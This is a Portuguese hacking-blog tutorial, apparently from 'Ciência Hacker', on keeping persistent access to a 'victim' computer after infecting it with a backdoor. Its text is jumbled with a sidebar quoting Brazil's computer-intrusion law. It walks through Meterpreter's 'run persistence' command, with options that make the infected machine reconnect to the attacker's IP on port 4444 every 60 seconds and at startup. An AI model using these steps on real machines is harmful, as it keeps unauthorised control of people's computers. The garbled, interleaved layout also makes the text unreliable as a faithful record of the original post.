Escolar Documentos
Profissional Documentos
Cultura Documentos
(Manutenção de Acesso)
Como previsto na Lei 12.737/2012 no
28 DE ABRIL DE 2015 / S0PH0S
Art. 154-A invadir dispositivo
informático alheio, conectado ou não à
Como já vimos diversas vezes o ataque que utiliza a conexão reversa vemos que temos
rede de computadores, mediante
acesso total a máquina, mas muitas vezes quando acontece uma queda de conexão
violação indevida de mecanismo de
devido a um desligamento do dispositivo (computador) ou a queda da internet. Hoje segurança e com o fim de obter,
veremos sobre como fazer uma manutenção de acesso que irá permitir todas vez que a adulterar ou destruir dados ou
vítima reconecte conosco de acordo com as opções que iremos setar na máquina alvo. informações sem autorização expressa
ou tácita do titular do dispositivo ou
instalar vulnerabilidades para obter
vantagem ilícita. Pena – detenção, de 3
(três) meses a 1 (um) ano, e multa.
Ciência Hacker
YouTube 6K
Caso ainda não saiba como criar uma conexão reversa com a vítima clique aqui para
Tweets de @cienciahacker
conferir o tutorial.
Após ter feito infectado a vítima com sua backdoor, vamos configurar a manutenção de
acesso.
Ciência Hacker
# run persistence -h
Nos trará todas as opções que podem ser listada para configuração de nosso acesso,
sendo assim setamos as configurações necessárias para configuração de nosso acesso.
Opção -A
Opção -X
– Setaremos o intervalo em segundos para nossa conexão (No exemplo setamos com
60 segundos).
Opção -i 60
– A porta que conectamos, deverá ser a mesma criada pelo nosso Payload
anteriormente, como a porta 4444 .
Opção -p 4444
Opção -f (Seu_IP)
Artigos, Pentest
MANUTENÇÃO DE ACESSO (MANTENDO CONEXÃO COM A VÍ TI MA)
s0ph0s@cienciahacker:~# whoami _
O seu endereço de email não será publicado Campos obrigatórios são marcados *
Nome *
Email *
Site
Comentário
Você pode usar estas tags e atributos de HTML: <a href="" title=""> <abbr
title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del